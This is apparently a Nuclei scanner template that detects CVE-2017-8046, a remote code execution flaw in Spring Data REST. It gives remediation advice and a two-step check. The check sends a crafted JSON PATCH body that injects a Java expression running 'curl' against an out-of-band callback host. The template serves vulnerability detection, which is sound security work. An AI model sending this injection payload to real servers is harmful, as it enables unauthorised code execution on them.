Spring Data REST < 2.6.9 (Ingalls SR9) / 3.0.1 (Kay SR1) - PATCH Request Remote Code Execution

id: CVE-2017-8046

info:
  name: Spring Data REST < 2.6.9 (Ingalls SR9) / 3.0.1 (Kay SR1) - PATCH Request Remote Code Execution
  author: domwhewell-sage
  severity: critical
  description: |
    Spring Data REST < 2.6.9 and 3.0.1, Spring Boot < 1.5.9 and 2.0 M6 contain a remote code execution caused by processing malicious PATCH requests with crafted JSON data, letting attackers execute arbitrary Java code, exploit requires sending malicious PATCH requests.
  impact: |
    Malicious PATCH requests submitted to servers using Spring Data REST versions prior to 2.6.9 (Ingalls SR9), versions prior to 3.0.1 (Kay SR1) and Spring Boot versions prior to 1.5.9, 2.0 M6 can use specially crafted JSON data to run arbitrary Java code.
  remediation: |
    To remediate this vulnerability, update to Spring Data REST version 2.6.9 or later, or 3.0.1 or later, and Spring Boot version 1.5.9 or later, or 2.0 M6 or later.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2017-8046
    - https://spring.io/security/cve-2017-8046
    - https://access.redhat.com/errata/RHSA-2018:2405
    - https://www.exploit-db.com/exploits/44289/
    - https://github.com/jkutner/spring-break-cve-2017-8046
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2017-8046
    cwe-id: CWE-20
    epss-score: 0.72782
    epss-percentile: 0.99376
    cpe: cpe:2.3:a:vmware:spring_boot:*:*:*:*:*:*:*:*
  metadata:
    vendor: vmware
    product: spring_boot
    shodan-query: http.title:"eureka"
    fofa-query: title="eureka"
    google-query: intitle:"eureka"
  tags: cve,cve2017,pivotal,springboot,pivotal_software,vkev,vuln
flow: |
  http(1)
  set("endpoint", iterate(template.endpoint)[0])
  http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}"

    redirects: true
    max-redirects: 3

    matchers-condition: and
    matchers:
      - type: word
        internal: true
        part: header
        words:
          - "application/json"
          - "application/hal+json"
          - "application/vnd.spring-boot.actuator"
        condition: or

      - type: word
        internal: true
        part: body
        words:
          - '"_embedded"'
          - '"_links"'
          - '"page"'
          - '"size"'
        condition: or

    extractors:
      - type: regex
        name: endpoint
        part: body
        group: 1
        internal: true
        regex:
          - '"href"\s*:\s*"([^"]+)\{\?page,size,sort\}"'

  - method: PATCH
    path:
      - "{{endpoint}}/1"
    headers:
      Content-Type: application/json-patch+json
    body: |
      [
        {
          "op": "replace",
          "path": "T(java.lang.Runtime).getRuntime().exec(\"curl {{interactsh-url}}\").x",
          "value": "CVE-2017-8046"
        }
      ]

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - dns

      - type: word
        part: body
        words:
          - "org.springframework"
# digest: 4a0a00473045022100fbf72ce1dec99936a03d3fb570507e79b5daa635d89d4e87ccbc60a97fb0ae980220604cf2261bea0b083768cf5dc07d109863da4dafa0287fc915db2211d45b7ddd:922c64590222798bb761d5b6d8e72950